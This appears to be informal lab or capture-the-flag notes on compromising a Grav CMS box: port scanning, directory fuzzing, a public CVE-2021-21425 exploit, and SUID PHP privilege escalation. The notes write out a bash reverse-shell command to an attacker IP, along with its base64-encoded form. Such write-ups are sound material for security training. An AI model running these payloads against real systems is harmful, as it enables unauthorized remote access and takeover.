PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-03-17 17:46 grav-admin/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.12/grav-admin/FUZZ
Try access these pages but no progress
(Try admin/admin login but failed)
Access ”http://192.168.243.12/grav-admin/“ --> Grav, Trilby Media
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.12/grav-admin/FUZZsearch exploits info fro Grav and Trilby (even though we don't know the version info ) --> https://github.com/CsEnox/CVE-2021-21425
Anyway, try it:
At firts, need to edit 449973.py file:
echo -ne "bash -i >& /dev/tcp/192.168.45.192/4444 0>&1" | base64 -w0===>YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE5Mi80NDQ0IDA+JjE=Run 'python3 49973.py' --> we get reverse shell from the target host!
linpeas --> As Exghost box, we saw [CVE-2021-4034] PwnKit but it didn't work 😄
find / -perm -u=s -type f 2>/dev/null --> /usr/bin/php7.4
According to https://gtfobins.github.io/gtfobins/php/, we can get root (even though id still is www-data)